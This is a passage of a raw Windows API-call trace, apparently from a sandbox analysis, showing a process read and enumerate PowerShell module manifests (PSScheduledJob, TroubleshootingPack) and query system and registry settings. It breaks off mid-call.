[0154.474] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1")) returned 0x20 [0154.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0154.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x56, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", lpFilePart=0x0) returned 0x55 [0154.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0154.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x56, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", lpFilePart=0x0) returned 0x55 [0154.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0154.474] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1"), fInfoLevelId=0x0, lpFileInformation=0x26eabe0 | out: lpFileInformation=0x26eabe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905a1f40, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x905a1f40, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x4b5da8bd, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x3ee)) returned 1 [0154.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0154.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0154.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x56, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", lpFilePart=0x0) returned 0x55 [0154.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0154.475] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x55c [0154.475] GetFileType (hFile=0x55c) returned 0x1 [0154.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0154.475] GetFileType (hFile=0x55c) returned 0x1 [0154.475] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0154.475] ReadFile (in: hFile=0x55c, lpBuffer=0x26eb9d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x26eb9d8*, lpNumberOfBytesRead=0x5a0e4c8*=0x3ee, lpOverlapped=0x0) returned 1 [0154.549] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x3ee [0154.550] ReadFile (in: hFile=0x55c, lpBuffer=0x26eb9d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x26eb9d8*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0154.550] CloseHandle (hObject=0x55c) returned 1 [0154.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0154.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0154.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x47, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", lpFilePart=0x0) returned 0x46 [0154.551] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe4f8 [0154.552] FindNextFileW (in: hFindFile=0x5bfe4f8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.552] FindNextFileW (in: hFindFile=0x5bfe4f8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e4bcac7, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22bb5ac3, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0154.552] FindNextFileW (in: hFindFile=0x5bfe4f8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91837f7c, ftCreationTime.dwHighDateTime=0x1c9ea12, ftLastAccessTime.dwLowDateTime=0x91837f7c, ftLastAccessTime.dwHighDateTime=0x1c9ea12, ftLastWriteTime.dwLowDateTime=0x91837f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5075, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack.format.ps1xml", cAlternateFileName="")) returned 1 [0154.552] FindNextFileW (in: hFindFile=0x5bfe4f8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd88a4ec5, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0xd88a4ec5, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x91837f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5198, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack.psd1", cAlternateFileName="")) returned 1 [0154.552] FindNextFileW (in: hFindFile=0x5bfe4f8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd88a4ec5, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0xd88a4ec5, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x91837f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5198, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack.psd1", cAlternateFileName="")) returned 0 [0154.552] FindClose (in: hFindFile=0x5bfe4f8 | out: hFindFile=0x5bfe4f8) returned 1 [0154.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0154.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0154.552] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1")) returned 0x20 [0154.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0154.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0154.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0154.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0154.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0154.553] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1"), fInfoLevelId=0x0, lpFileInformation=0x26f2148 | out: lpFileInformation=0x26f2148*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd88a4ec5, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0xd88a4ec5, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x91837f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5198)) returned 1 [0154.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0154.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0154.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0154.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0154.554] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x55c [0154.554] GetFileType (hFile=0x55c) returned 0x1 [0154.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0154.554] GetFileType (hFile=0x55c) returned 0x1 [0154.554] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0154.554] ReadFile (in: hFile=0x55c, lpBuffer=0x26f2f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x26f2f58*, lpNumberOfBytesRead=0x5a0e4c8*=0x1000, lpOverlapped=0x0) returned 1 [0154.652] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x1000 [0154.653] ReadFile (in: hFile=0x55c, lpBuffer=0x26f2f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x26f2f58*, lpNumberOfBytesRead=0x5a0e4c8*=0x1000, lpOverlapped=0x0) returned 1 [0154.655] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x2000 [0154.656] ReadFile (in: hFile=0x55c, lpBuffer=0x26f2f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x26f2f58*, lpNumberOfBytesRead=0x5a0e4c8*=0x1000, lpOverlapped=0x0) returned 1 [0154.656] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x3000 [0154.656] ReadFile (in: hFile=0x55c, lpBuffer=0x26f2f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x26f2f58*, lpNumberOfBytesRead=0x5a0e4c8*=0x1000, lpOverlapped=0x0) returned 1 [0154.657] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x4000 [0154.657] ReadFile (in: hFile=0x55c, lpBuffer=0x26f2f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x26f2f58*, lpNumberOfBytesRead=0x5a0e4c8*=0x1000, lpOverlapped=0x0) returned 1 [0154.657] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x5000 [0154.657] ReadFile (in: hFile=0x55c, lpBuffer=0x26f2f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x26f2f58*, lpNumberOfBytesRead=0x5a0e4c8*=0x198, lpOverlapped=0x0) returned 1 [0154.657] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x5198 [0154.657] ReadFile (in: hFile=0x55c, lpBuffer=0x26f2f58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x26f2f58*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0154.658] CloseHandle (hObject=0x55c) returned 1 [0154.659] CoCreateGuid (in: pguid=0x5a0e508 | out: pguid=0x5a0e508*(Data1=0xb36da18b, Data2=0x510d, Data3=0x4fab, Data4=([0]=0xa5, [1]=0x6e, [2]=0xec, [3]=0x62, [4]=0xea, [5]=0xa1, [6]=0x20, [7]=0xc0))) returned 0x0 [0154.660] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x55c [0154.660] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x560 [0154.666] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x564 [0154.666] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x568 [0154.666] SetEvent (hEvent=0x568) returned 1 [0154.666] SetEvent (hEvent=0x55c) returned 1 [0154.666] SetEvent (hEvent=0x560) returned 1 [0154.666] SetEvent (hEvent=0x564) returned 1 [0154.666] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x56c [0154.667] SetThreadUILanguage (LangId=0x0) returned 0x409 [0154.668] EtwEventActivityIdControl () returned 0x0 [0154.668] EtwEventActivityIdControl () returned 0x0 [0154.668] EtwEventActivityIdControl () returned 0x0 [0154.675] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1")) returned 0x20 [0154.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0154.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0154.676] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0de40, Length=0x20, ResultLength=0x5a0deb0 | out: SystemInformation=0x5a0de40, ResultLength=0x5a0deb0*=0x0) returned 0xc0000003 [0154.676] GetSystemInfo (in: lpSystemInfo=0x5a0debc | out: lpSystemInfo=0x5a0debc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0154.676] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0de4c | out: phkResult=0x5a0de4c*=0x570) returned 0x0 [0154.677] RegQueryValueExW (in: hKey=0x570, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0de68, lpData=0x0, lpcbData=0x5a0de64*=0x0 | out: lpType=0x5a0de68*=0x0, lpData=0x0, lpcbData=0x5a0de64*=0x0) returned 0x2 [0154.677] RegCloseKey (hKey=0x570) returned 0x0 [0154.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0154.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0154.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ddc4) returned 1 [0154.677] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x570 [0154.678] GetFileType (hFile=0x570) returned 0x1 [0154.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ddc0) returned 1 [0154.678] GetFileType (hFile=0x570) returned 0x1 [0154.678] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0de00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0de00*=0) returned 0x0 [0154.678] ReadFile (in: hFile=0x570, lpBuffer=0x2710efc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0de2c, lpOverlapped=0x0 | out: lpBuffer=0x2710efc*, lpNumberOfBytesRead=0x5a0de2c*=0x1000, lpOverlapped=0x0) returned 1 [0154.679] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0de00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0de00*=0) returned 0x1000 [0154.679] ReadFile (in: hFile=0x570, lpBuffer=0x2710efc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0de2c, lpOverlapped=0x0 | out: lpBuffer=0x2710efc*, lpNumberOfBytesRead=0x5a0de2c*=0x1000, lpOverlapped=0x0) returned 1 [0154.679] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0de00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0de00*=0) returned 0x2000 [0154.680] ReadFile (in: hFile=0x570, lpBuffer=0x2710efc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0de2c, lpOverlapped=0x0 | out: lpBuffer=0x2710efc*, lpNumberOfBytesRead=0x5a0de2c*=0x1000, lpOverlapped=0x0) returned 1 [0154.680] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0de00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0de00*=0) returned 0x3000 [0154.680] ReadFile (in: hFile=0x570, lpBuffer=0x2710efc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0de2c, lpOverlapped=0x0 | out: lpBuffer=0x2710efc*, lpNumberOfBytesRead=0x5a0de2c*=0x1000, lpOverlapped=0x0) returned 1 [0154.681] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0de00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0de00*=0) returned 0x4000 [0154.681] ReadFile (in: hFile=0x570, lpBuffer=0x2710efc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0de2c, lpOverlapped=0x0 | out: lpBuffer=0x2710efc*, lpNumberOfBytesRead=0x5a0de2c*=0x1000, lpOverlapped=0x0) returned 1 [0154.681] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0de00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0de00*=0) returned 0x5000 [0154.681] ReadFile (in: hFile=0x570, lpBuffer=0x2710efc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0de2c, lpOverlapped=0x0 | out: lpBuffer=0x2710efc*, lpNumberOfBytesRead=0x5a0de2c*=0x198, lpOverlapped=0x0) returned 1 [0154.681] SetFilePointer (in: hFile=0x570, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0de00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0de00*=0) returned 0x5198 [0154.682] ReadFile (in: hFile=0x570, lpBuffer=0x2710efc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0de2c, lpOverlapped=0x0 | out: lpBuffer=0x2710efc*, lpNumberOfBytesRead=0x5a0de2c*=0x0, lpOverlapped=0x0) returned 1 [0154.682] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0dd94, Length=0x20, ResultLength=0x5a0de04 | out: SystemInformation=0x5a0dd94, ResultLength=0x5a0de04*=0x0) returned 0xc0000003 [0154.682] GetSystemInfo (in: lpSystemInfo=0x5a0de10 | out: lpSystemInfo=0x5a0de10*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0154.683] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0dda0 | out: phkResult=0x5a0dda0*=0x574) returned 0x0 [0154.683] RegQueryValueExW (in: hKey=0x574, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0ddbc, lpData=0x0, lpcbData=0x5a0ddb8*=0x0 | out: lpType=0x5a0ddbc*=0x0, lpData=0x0, lpcbData=0x5a0ddb8*=0x0) returned 0x2 [0154.683] RegCloseKey (hKey=0x574) returned 0x0 [0154.683] CloseHandle (hObject=0x570) returned 1 [0154.685] CoCreateGuid (in: pguid=0x5a0de90 | out: pguid=0x5a0de90*(Data1=0x388b73d3, Data2=0x5d61, Data3=0x444e, Data4=([0]=0xbc, [1]=0x8b, [2]=0xca, [3]=0x75, [4]=0x44, [5]=0xdf, [6]=0xb4, [7]=0xc7))) returned 0x0 [0154.685] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0dbf0 | out: lpPerformanceCount=0x5a0dbf0*=2943949553458) returned 1 [0154.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0154.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0154.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d8dc) returned 1 [0154.685] GetFileAttributesExW (in: 